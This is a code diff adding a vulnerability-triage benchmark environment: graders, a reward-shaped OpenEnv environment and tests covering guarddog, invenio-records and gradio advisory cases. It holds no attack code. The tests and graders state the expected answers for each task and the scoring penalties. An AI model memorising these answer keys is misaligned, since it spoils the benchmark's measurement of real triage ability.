+         snapshot = _fetch_live_snapshot(seed)
+     except Exception:
+         snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
+     return _build_case(seed, snapshot)
+
+
+ CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
+     task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
+ }
+
+
+ BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
+     difficulty: [
+         task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
+     ]
+     for difficulty in DIFFICULTY_ORDER
+ }
+
+
+ def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
+     """Choose a benchmark task with balanced random difficulty sampling.
+
+     If a seed is provided, selection is deterministic from that seed.
+     Otherwise, sampling uses the environment RNG state.
+     """
+
+     chooser = random.Random(seed) if seed is not None else rng
+     difficulty = chooser.choice(DIFFICULTY_ORDER)
+     bucket = BENCHMARK_TASKS_BY_DIFFICULTY[difficulty]
+     return chooser.choice(bucket)
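The `_range_string` helper above turns OSV `ECOSYSTEM` events into compact range strings. As a minimal standalone sketch of that event-to-range mapping (re-implemented here for illustration only; the real module applies this per `ranges` entry and joins the results with `" ; "`):

```python
from typing import Dict, List, Optional


def range_string(events: List[Dict[str, str]]) -> str:
    """Mirror of the per-range event handling in cases._range_string."""
    introduced: Optional[str] = None
    fixed: Optional[str] = None
    last: Optional[str] = None
    for event in events:
        if "introduced" in event:
            introduced = str(event["introduced"])
        if "last_affected" in event:
            last = str(event["last_affected"])
        if "fixed" in event:
            fixed = str(event["fixed"])
    # "introduced": "0" is the implicit start of history, so only the fix bound matters
    if introduced in (None, "0") and fixed:
        return f"<{fixed}"
    if introduced and fixed:
        return f">={introduced},<{fixed}"
    if introduced and last:
        return f">={introduced},<={last}"
    if introduced:
        return f">={introduced}"
    return "unknown"


print(range_string([{"introduced": "0"}, {"fixed": "0.1.5"}]))      # <0.1.5
print(range_string([{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]))  # >=1.1.0,<1.1.1
print(range_string([{"introduced": "0"}]))                          # >=0
```

The third call reproduces the `>=0` cue exploited by the hard Gradio case: an `introduced: 0` event with no `fixed` event means every released version is affected and no patch exists yet.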
server/graders.py ADDED
@@ -0,0 +1,121 @@
1
+ """Deterministic graders for the vulnerability triage benchmark."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import re
6
+ from typing import Dict, Iterable, List
7
+
8
+ try:
9
+ from ..models import TriageDraft
10
+ from .cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
11
+ except ImportError:
12
+ from models import TriageDraft
13
+ from server.cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
14
+
15
+
16
+ WEIGHTS: Dict[str, float] = {
17
+ "validity": 0.20,
18
+ "affected_package": 0.10,
19
+ "affected_versions": 0.10,
20
+ "severity": 0.20,
21
+ "exploitability": 0.15,
22
+ "next_action": 0.15,
23
+ "missing_information": 0.10,
24
+ }
25
+
26
+
27
+ def normalize_text(value: str) -> str:
28
+ return " ".join(value.strip().lower().split())
29
+
30
+
31
+ def normalize_list(values: Iterable[str]) -> List[str]:
32
+ return sorted({normalize_text(value) for value in values if normalize_text(value)})
33
+
34
+
35
+ def set_similarity(actual: Iterable[str], expected: Iterable[str]) -> float:
36
+ actual_set = set(normalize_list(actual))
37
+ expected_set = set(normalize_list(expected))
38
+ if not actual_set and not expected_set:
39
+ return 1.0
40
+ if not actual_set or not expected_set:
41
+ return 0.0
42
+ union = actual_set | expected_set
43
+ return len(actual_set & expected_set) / len(union)
44
+
45
+
46
+ def field_match(actual: str, expected: str) -> float:
47
+ return 1.0 if normalize_text(actual) == normalize_text(expected) else 0.0
48
+
49
+
50
+ def _normalize_version_range(value: str) -> str:
51
+ """Canonicalize a version range string for flexible comparison.
52
+
53
+ Two representations that are treated as equivalent:
54
+ - A trivial lower bound ``>=0`` / ``>=0.0`` / ``>=0.0.0`` followed by a
55
+ comma is stripped, so ``>=0,<0.1.5`` compares equal to ``<0.1.5``.
56
+     - Semicolon-separated multi-branch segments are sorted so submission
+       order does not matter.
+     """
+     text = normalize_text(value)
+     segments = [seg.strip() for seg in text.split(";") if seg.strip()]
+     normalized: List[str] = []
+     for seg in segments:
+         # Remove trivial lower-bound prefix: >=0, >=0.0, >=0.0.0 before comma
+         seg = re.sub(r">=\s*0(?:\.0)*\s*,\s*", "", seg)
+         # Collapse whitespace around comparison operators
+         seg = re.sub(r"\s*([><=!]+)\s*", r"\1", seg).strip()
+         if seg:
+             normalized.append(seg)
+     return " ; ".join(sorted(normalized))
+
+
+ def version_range_match(actual: str, expected: str) -> float:
+     """Score 1.0 when version ranges are semantically equivalent."""
+     return (
+         1.0
+         if _normalize_version_range(actual) == _normalize_version_range(expected)
+         else 0.0
+     )
+
+
+ def grade_case(case: CaseDefinition, draft: TriageDraft) -> Dict[str, float]:
+     breakdown = {
+         "validity": field_match(draft.validity, case.truth.validity),
+         "affected_package": field_match(
+             draft.affected_package, case.truth.affected_package
+         ),
+         "affected_versions": version_range_match(
+             draft.affected_versions, case.truth.affected_versions
+         ),
+         "severity": field_match(draft.severity, case.truth.severity),
+         "exploitability": field_match(
+             draft.exploitability, case.truth.exploitability
+         ),
+         "next_action": field_match(draft.next_action, case.truth.next_action),
+         "missing_information": set_similarity(
+             draft.missing_information, case.truth.missing_information
+         ),
+     }
+     breakdown["total"] = round(
+         sum(breakdown[name] * WEIGHTS[name] for name in WEIGHTS), 4
+     )
+
+     # Cascading difficulty penalties
+     difficulty = getattr(case, "difficulty", "hard")
+
+     # HARD penalty: if the truth action is request_info (meaning a patch is missing)
+     # and the model tries to publish an advisory or patch, that is a critical logic failure.
+     if difficulty == "hard" and case.truth.next_action == "request_info" and draft.next_action in {"publish_advisory", "patch"}:
+         breakdown["total"] = round(breakdown["total"] * 0.5, 4)
+
+     # MEDIUM penalty: medium tasks specifically test the ability to decode
+     # raw intelligence (code diffs, conflicting EPSS/honeypot numbers) against decoys.
+     # A model that fails to extract both severity and exploitability accurately has failed the core challenge.
+     elif difficulty == "medium" and breakdown["severity"] == 0.0 and breakdown["exploitability"] == 0.0:
+         breakdown["total"] = round(breakdown["total"] * 0.75, 4)
+
+     return breakdown
+
+
+ def grade_task(task_id: str, draft: TriageDraft) -> Dict[str, float]:
+     return grade_case(get_case_definition(task_id), draft)
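
The two regex passes above can be exercised standalone. This is a minimal sketch that copies them into a self-contained function (the name `normalize_version_range` is hypothetical, and plain lowercasing stands in for the module's `normalize_text` helper):

```python
import re

def normalize_version_range(text: str) -> str:
    # Split semicolon-separated branches, lowercase as a stand-in for normalize_text.
    segments = [seg.strip() for seg in text.lower().split(";") if seg.strip()]
    normalized = []
    for seg in segments:
        # Drop trivial lower bounds like ">=0," or ">=0.0.0," before a comma.
        seg = re.sub(r">=\s*0(?:\.0)*\s*,\s*", "", seg)
        # Collapse whitespace around comparison operators.
        seg = re.sub(r"\s*([><=!]+)\s*", r"\1", seg).strip()
        if seg:
            normalized.append(seg)
    # Sort branches so submission order does not matter.
    return " ; ".join(sorted(normalized))

print(normalize_version_range(">=0.0.0, <0.1.5"))          # <0.1.5
print(normalize_version_range(">=1.1.0,<1.1.1 ; <1.0.2"))  # <1.0.2 ; >=1.1.0,<1.1.1
```

Under these rules, `">=0,<0.1.5"` and `"<0.1.5"` normalize identically, which is exactly what lets `version_range_match` score semantically equivalent submissions as 1.0.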
server/requirements.txt ADDED
@@ -0,0 +1 @@
+ openenv-core[core]>=0.2.3
server/vuln_triage_env_environment.py ADDED
@@ -0,0 +1,315 @@
+ """OpenEnv environment implementation for vulnerability triage."""
+
+ from __future__ import annotations
+
+ import random
+ from typing import Dict, List, Optional
+ from uuid import uuid4
+
+ from openenv.core.env_server.interfaces import Environment
+
+ try:
+     from ..models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
+     from .cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
+     from .graders import grade_case, normalize_text
+ except ImportError:
+     from models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
+     from server.cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
+     from server.graders import grade_case, normalize_text
+
+
+ FIELD_TO_ATTR = {
+     "set_validity": "validity",
+     "set_affected_package": "affected_package",
+     "set_affected_versions": "affected_versions",
+     "set_severity": "severity",
+     "set_exploitability": "exploitability",
+     "set_next_action": "next_action",
+ }
+
+
+ class VulnTriageEnvironment(Environment):
+     """Deterministic multi-step environment for OSS vulnerability triage."""
+
+     SUPPORTS_CONCURRENT_SESSIONS: bool = True
+
+     def __init__(self):
+         self._case: CaseDefinition = CASE_DEFINITIONS[TASK_ORDER[0]]
+         self._rng = random.Random(0)
+         self._revealed_evidence_ids: List[str] = []
+         self._draft = TriageDraft()
+         self._action_history: List[str] = []
+         self._submitted = False
+         self._score_breakdown: Dict[str, float] = {}
+         self._state = VulnTriageState(
+             episode_id=str(uuid4()),
+             step_count=0,
+             task_id=self._case.task_id,
+             difficulty=self._case.difficulty,
+             draft=self._draft,
+             revealed_evidence_ids=[],
+             action_history=[],
+             steps_remaining=self._case.max_steps,
+             submitted=False,
+             final_score=None,
+             score_breakdown={},
+         )
+
+     def reset(
+         self,
+         seed: Optional[int] = None,
+         episode_id: Optional[str] = None,
+         task_id: Optional[str] = None,
+         **_: object,
+     ) -> VulnTriageObservation:
+         if task_id:
+             self._case = get_case_definition(task_id)
+         else:
+             selected_task_id = choose_balanced_task_id(seed, self._rng)
+             self._case = get_case_definition(selected_task_id)
+
+         self._revealed_evidence_ids = []
+         self._draft = TriageDraft()
+         self._action_history = []
+         self._submitted = False
+         self._score_breakdown = grade_case(self._case, self._draft)
+         self._state = VulnTriageState(
+             episode_id=episode_id or str(uuid4()),
+             step_count=0,
+             task_id=self._case.task_id,
+             difficulty=self._case.difficulty,
+             draft=self._draft.model_copy(deep=True),
+             revealed_evidence_ids=[],
+             action_history=[],
+             steps_remaining=self._case.max_steps,
+             submitted=False,
+             final_score=None,
+             score_breakdown=self._score_breakdown,
+         )
+         return self._observation(reward=0.0)
+
+     def step(
+         self,
+         action: VulnTriageAction,
+         timeout_s: Optional[float] = None,
+         **_: object,
+     ) -> VulnTriageObservation:
+         del timeout_s
+         if self._submitted:
+             return self._observation(
+                 reward=-0.05,
+                 done=True,
+                 metadata={"error": "episode_already_submitted"},
+             )
+
+         self._state.step_count += 1
+         reward = -0.005
+         note = action.action_type
+
+         if action.action_type == "read_report":
+             reward += 0.03 if not any(h.startswith("read_report") for h in self._action_history) else -0.02
+             note = "read_report"
+         elif action.action_type == "search_nvd_database":
+             reward += self._handle_nvd_search(action)
+             note = f"search_nvd_database:{action.value or ''}"
+         elif action.action_type == "fetch_commit_diff":
+             reward += self._handle_commit_fetch(action)
+             note = f"fetch_commit_diff:{action.value or ''}"
+         elif action.action_type == "message_maintainer":
+             reward += self._handle_message_maintainer(action)
+             note = f"message_maintainer:{action.value or ''}"
+         elif action.action_type == "inspect_evidence":
+             reward += self._handle_inspect(action)
+             note = f"inspect_evidence:{action.evidence_id or ''}"
+         elif action.action_type in FIELD_TO_ATTR:
+             reward += self._handle_field_update(action)
+             note = f"{action.action_type}:{action.value or ''}"
+         elif action.action_type in {"set_missing_information", "request_more_info"}:
+             reward += self._handle_missing_info(action)
+             note = f"{action.action_type}:{action.value or ''}"
+         elif action.action_type == "submit_triage":
+             return self._handle_submit(action)
+         else:
+             reward -= 0.05
+             note = f"invalid_action:{action.action_type}"
+
+         self._action_history.append(note)
+         self._score_breakdown = grade_case(self._case, self._draft)
+         self._sync_state()
+
+         if self._state.steps_remaining == 0:
+             timeout_penalty = max(self._score_breakdown["total"] - 0.1, 0.0)
+             self._submitted = True
+             self._state.submitted = True
+             self._state.final_score = round(timeout_penalty, 4)
+             return self._observation(
+                 reward=round(timeout_penalty, 4),
+                 done=True,
+                 final_score=round(timeout_penalty, 4),
+                 metadata={"termination_reason": "step_budget_exhausted"},
+             )
+
+         return self._observation(reward=round(reward, 4))
+
+     def _handle_nvd_search(self, action: VulnTriageAction) -> float:
+         query = (action.value or "").strip().lower()
+         if not query:
+             return -0.05
+         # The query must match one of the aliases in the seed's fallback snapshot
+         # (or the OSV id itself) for the search to reveal the nvd_assessment evidence.
+         seed = SEEDS[self._case.task_id]
+         snapshot_aliases = [normalize_text(a) for a in seed.fallback_snapshot.get("aliases", [])]
+
+         # nvd_assessment holds the real data. A search for a decoy CVE would conceptually
+         # return the decoy record; for simplicity we only check for a match on the real CVE.
+         if normalize_text(query) in snapshot_aliases or query == normalize_text(seed.osv_id):
+             if "nvd_assessment" not in self._revealed_evidence_ids:
+                 self._revealed_evidence_ids.append("nvd_assessment")
+             return 0.08
+         return -0.04
+
+     def _handle_commit_fetch(self, action: VulnTriageAction) -> float:
+         query = (action.value or "").strip()
+         if not query:
+             return -0.05
+         # If a github_commit_diff evidence piece exists, check whether the query appears
+         # in its title ("GitHub Commit <hash>").
+         for item in self._case.evidence:
+             if item["evidence_id"] == "github_commit_diff":
+                 if query.lower() in item["title"].lower():
+                     if "github_commit_diff" not in self._revealed_evidence_ids:
+                         self._revealed_evidence_ids.append("github_commit_diff")
+                     return 0.08
+         return -0.04
+
+     def _handle_message_maintainer(self, action: VulnTriageAction) -> float:
+         msg = (action.value or "").strip()
+         if len(msg) < 5:
+             return -0.05  # Need a real message
+
+         # Messaging the maintainer reveals the vendor_status evidence if it exists.
+         has_vendor_evidence = False
+         for item in self._case.evidence:
+             if item["evidence_id"] == "vendor_status":
+                 if "vendor_status" not in self._revealed_evidence_ids:
+                     self._revealed_evidence_ids.append("vendor_status")
+                 has_vendor_evidence = True
+                 break
+
+         return 0.08 if has_vendor_evidence else -0.02
+
+     def _handle_inspect(self, action: VulnTriageAction) -> float:
+         evidence_id = action.evidence_id or ""
+         all_ids = {item["evidence_id"] for item in self._case.evidence}
+         if evidence_id not in all_ids:
+             return -0.06
+
+         # Trap: interactive evidence cannot be inspected directly as if it were static JSON.
+         if evidence_id in {"nvd_assessment", "github_commit_diff", "vendor_status"}:
+             return -0.05
+
+         if evidence_id in self._revealed_evidence_ids:
+             return -0.02
+
+         self._revealed_evidence_ids.append(evidence_id)
+         if evidence_id in self._case.truth.supporting_evidence_ids:
+             return 0.06
+         return 0.02
+
+     def _handle_field_update(self, action: VulnTriageAction) -> float:
+         attr = FIELD_TO_ATTR[action.action_type]
+         new_value = (action.value or "").strip()
+         if not new_value:
+             return -0.04
+
+         current_value = getattr(self._draft, attr)
+         if normalize_text(current_value) == normalize_text(new_value):
+             return -0.01
+
+         setattr(self._draft, attr, new_value)
+         expected_value = getattr(self._case.truth, attr)
+         if normalize_text(new_value) == normalize_text(expected_value):
+             return 0.08
+         return -0.03
+
+     def _handle_missing_info(self, action: VulnTriageAction) -> float:
+         value = (action.value or "").strip()
+         if not value:
+             return -0.04
+
+         normalized_existing = {normalize_text(item) for item in self._draft.missing_information}
+         if normalize_text(value) not in normalized_existing:
+             self._draft.missing_information.append(value)
+
+         required = {normalize_text(item) for item in self._case.truth.missing_information}
+         if normalize_text(value) in required:
+             return 0.06
+         if action.action_type == "request_more_info" and self._case.truth.next_action == "request_info":
+             return 0.02
+         return -0.02
+
+     def _handle_submit(self, action: VulnTriageAction) -> VulnTriageObservation:
+         del action
+         self._submitted = True
+         breakdown = grade_case(self._case, self._draft)
+         final_score = breakdown["total"]
+         if len(self._revealed_evidence_ids) < max(2, len(self._case.truth.supporting_evidence_ids) // 2):
+             final_score = max(0.0, round(final_score - 0.1, 4))
+
+         self._action_history.append("submit_triage")
+         self._score_breakdown = {**breakdown, "total": final_score}
+         self._state.submitted = True
+         self._state.final_score = final_score
+         self._sync_state()
+         return self._observation(
+             reward=final_score,
+             done=True,
+             final_score=final_score,
+             metadata={"termination_reason": "submitted"},
+         )
+
+     def _sync_state(self) -> None:
+         self._state.task_id = self._case.task_id
+         self._state.difficulty = self._case.difficulty
+         self._state.draft = self._draft.model_copy(deep=True)
+         self._state.revealed_evidence_ids = list(self._revealed_evidence_ids)
+         self._state.action_history = list(self._action_history)
+         self._state.steps_remaining = max(self._case.max_steps - self._state.step_count, 0)
+         self._state.score_breakdown = dict(self._score_breakdown)
+
+     def _observation(
+         self,
+         reward: float,
+         done: bool = False,
+         final_score: Optional[float] = None,
+         metadata: Optional[Dict[str, object]] = None,
+     ) -> VulnTriageObservation:
+         self._sync_state()
+         visible_evidence = [
+             EvidenceItem.model_validate(item)
+             for item in self._case.evidence
+             if item["evidence_id"] in self._revealed_evidence_ids
+         ]
+         return VulnTriageObservation(
+             task_id=self._case.task_id,
+             difficulty=self._case.difficulty,
+             objective=self._case.objective,
+             report_summary=self._case.report_summary,
+             visible_evidence=visible_evidence,
+             available_evidence=[
+                 item["evidence_id"]
+                 for item in self._case.evidence
+                 if item["evidence_id"] not in self._revealed_evidence_ids
+             ],
+             draft=self._draft.model_copy(deep=True),
+             action_history=list(self._action_history),
+             steps_remaining=max(self._case.max_steps - self._state.step_count, 0),
+             score_breakdown=dict(self._score_breakdown),
+             final_score=final_score,
+             done=done,
+             reward=reward,
+             metadata=metadata or {},
+         )
+
+     @property
+     def state(self) -> VulnTriageState:
+         self._sync_state()
+         return self._state
tests/test_environment.py ADDED
@@ -0,0 +1,220 @@
+ import random
+
+ from models import TriageDraft, VulnTriageAction
+ from server.cases import choose_balanced_task_id, CASE_DEFINITIONS
+ from server.graders import grade_task, version_range_match
+ from server.vuln_triage_env_environment import VulnTriageEnvironment
+
+
+ # ---------------------------------------------------------------------------
+ # Core environment tests
+ # ---------------------------------------------------------------------------
+
+ def test_easy_task_can_be_solved_deterministically():
+     """Easy task should be solvable in 10 steps with just 2 evidence reads."""
+     env = VulnTriageEnvironment()
+     env.reset(task_id="task_easy_guarddog")
+     env.step(VulnTriageAction(action_type="read_report"))
+     env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="osv_advisory"))
+     env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="affected_versions"))
+     env.step(VulnTriageAction(action_type="set_validity", value="valid"))
+     env.step(VulnTriageAction(action_type="set_affected_package", value="guarddog"))
+     env.step(VulnTriageAction(action_type="set_affected_versions", value="<0.1.5"))
+     env.step(VulnTriageAction(action_type="set_severity", value="medium"))
+     env.step(VulnTriageAction(action_type="set_exploitability", value="low"))
+     env.step(VulnTriageAction(action_type="set_next_action", value="patch"))
+     result = env.step(VulnTriageAction(action_type="submit_triage"))
+     assert result.done is True
+     assert result.final_score == 1.0
+
+
+ def test_medium_task_uses_real_provider_backed_truth():
+     env = VulnTriageEnvironment()
+     env.reset(task_id="task_medium_invenio")
+     env.step(VulnTriageAction(action_type="set_validity", value="valid"))
+     env.step(VulnTriageAction(action_type="set_affected_package", value="invenio-records"))
+     breakdown = grade_task("task_medium_invenio", env.state.draft)
+     assert breakdown["validity"] == 1.0
+     assert breakdown["affected_package"] == 1.0
+
+
+ def test_balanced_sampler_is_seed_reproducible():
+     first = choose_balanced_task_id(7, random.Random(0))
+     second = choose_balanced_task_id(7, random.Random(999))
+     assert first == second
+
+
+ def test_environment_reset_without_task_id_samples_valid_difficulties():
+     env = VulnTriageEnvironment()
+     seen = {env.reset().difficulty for _ in range(12)}
+     assert seen == {"easy", "medium", "hard"}
+
+
+ # ---------------------------------------------------------------------------
+ # Fix 1: version range normalizer accepts equivalent expressions
+ # ---------------------------------------------------------------------------
+
+ def test_version_range_match_accepts_trivial_lower_bound():
+     assert version_range_match(">=0,<0.1.5", "<0.1.5") == 1.0
+     assert version_range_match(">=0.0.0,<0.1.5", "<0.1.5") == 1.0
+
+
+ def test_version_range_match_is_order_insensitive_for_segments():
+     a = "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2"
+     b = ">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2"
+     assert version_range_match(a, b) == 1.0
+
+
+ def test_version_range_match_different_ranges_score_zero():
+     assert version_range_match("<0.1.4", "<0.1.5") == 0.0
+
+
+ # ---------------------------------------------------------------------------
+ # Fix 2: multi-branch affected versions captured correctly
+ # ---------------------------------------------------------------------------
+
+ def test_medium_invenio_ground_truth_includes_all_branches():
+     truth = CASE_DEFINITIONS["task_medium_invenio"].truth
+     assert "<1.0.2" in truth.affected_versions
+     assert ">=1.1.0,<1.1.1" in truth.affected_versions
+     assert ">=1.2.0,<1.2.2" in truth.affected_versions
+
+
+ def test_medium_invenio_all_branches_score_full_points():
+     draft = TriageDraft(
+         validity="valid",
+         affected_package="invenio-records",
+         affected_versions=">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2",
+         severity="medium",
+         exploitability="low",
+         next_action="publish_advisory",
+     )
+     breakdown = grade_task("task_medium_invenio", draft)
+     assert breakdown["affected_versions"] == 1.0
+
+
+ # ---------------------------------------------------------------------------
+ # Difficulty redesign — Easy task
+ # ---------------------------------------------------------------------------
+
+ def test_easy_task_only_needs_two_evidence_items():
+     """Easy task supporting_evidence_ids should be just 2 items, not 4."""
+     truth = CASE_DEFINITIONS["task_easy_guarddog"].truth
+     assert truth.supporting_evidence_ids == ["osv_advisory", "affected_versions"]
+     assert len(truth.supporting_evidence_ids) == 2
+
+
+ def test_easy_task_max_steps_is_tight():
+     assert CASE_DEFINITIONS["task_easy_guarddog"].max_steps == 10
+
+
+ # ---------------------------------------------------------------------------
+ # Difficulty redesign — Medium task
+ # ---------------------------------------------------------------------------
+
+ def test_medium_task_has_threat_intel_evidence():
+     """Medium task should inject a threat_intel_signal evidence item."""
+     evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_medium_invenio"].evidence]
+     assert "threat_intel_signal" in evidence_ids
+
+
+ def test_medium_task_exploitability_is_medium_not_low():
+     """EPSS says low but threat intel overrides to medium — key difficulty driver."""
+     truth = CASE_DEFINITIONS["task_medium_invenio"].truth
+     assert truth.exploitability == "medium", (
+         "Medium task exploitability must be 'medium' (overriding EPSS) "
+         "so any model that only reads the EPSS evidence gets it wrong."
+     )
+
+
+ def test_medium_task_exploitability_costs_points_if_epss_only():
+     """A model that reads only EPSS and submits 'low' exploitability loses points."""
+     draft = TriageDraft(
+         validity="valid",
+         affected_package="invenio-records",
+         affected_versions="<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
+         severity="medium",
+         exploitability="low",  # wrong — EPSS-only answer
+         next_action="publish_advisory",
+     )
+     breakdown = grade_task("task_medium_invenio", draft)
+     assert breakdown["exploitability"] == 0.0
+     assert breakdown["total"] < 1.0
+
+
+ # ---------------------------------------------------------------------------
+ # Difficulty redesign — Hard task
+ # ---------------------------------------------------------------------------
+
+ def test_hard_task_correct_next_action_is_request_info():
+     """Hard task must require request_info, not publish_advisory."""
+     truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+     assert truth.next_action == "request_info", (
+         "Hard task next_action must be 'request_info' — no patch exists yet."
+     )
+
+
+ def test_hard_task_has_vendor_status_evidence():
+     """Hard task should inject a vendor_status evidence item explaining no patch."""
+     evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_hard_gradio"].evidence]
+     assert "vendor_status" in evidence_ids
+
+
+ def test_hard_task_affected_versions_covers_all():
+     """Hard task affected_versions must be >=0 (no fixed version)."""
+     truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+     assert truth.affected_versions == ">=0"
+
+
+ def test_hard_task_publish_advisory_costs_next_action_points():
+     """A model that naively publishes instead of requesting info loses 15%."""
+     truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+     draft = TriageDraft(
+         validity="valid",
+         affected_package="gradio",
+         affected_versions=">=0",
+         severity="medium",
+         exploitability="low",
+         next_action="publish_advisory",  # wrong — no patch exists
+         missing_information=list(truth.missing_information),
+     )
+     breakdown = grade_task("task_hard_gradio", draft)
+     assert breakdown["next_action"] == 0.0
+     assert breakdown["total"] < 1.0
+
+
+ def test_hard_task_request_info_scores_full():
+     """The correct hard-task answer should score 1.0."""
+     truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+     draft = TriageDraft(
+         validity=truth.validity,
+         affected_package=truth.affected_package,
+         affected_versions=truth.affected_versions,
+         severity=truth.severity,
+         exploitability=truth.exploitability,
+         next_action="request_info",
+         missing_information=list(truth.missing_information),
+     )
+     breakdown = grade_task("task_hard_gradio", draft)
+     assert breakdown["next_action"] == 1.0
+     assert breakdown["total"] == 1.0
+
+
+ def test_hard_task_has_non_empty_missing_information():
+     truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+     assert len(truth.missing_information) >= 3
+
+
+ def test_hard_task_empty_missing_info_costs_points():
+     draft = TriageDraft(
+         validity="valid",
+         affected_package="gradio",
+         affected_versions=">=0",
+         severity="medium",
+         exploitability="low",
+         next_action="request_info",
+         missing_information=[],
+     )
+     breakdown = grade_task("task_hard_gradio", draft)
+     assert breakdown["missing_information"] == 0.0
+     assert breakdown["total"] < 1.0
uv.lock ADDED
The diff for this file is too large to render. See raw diff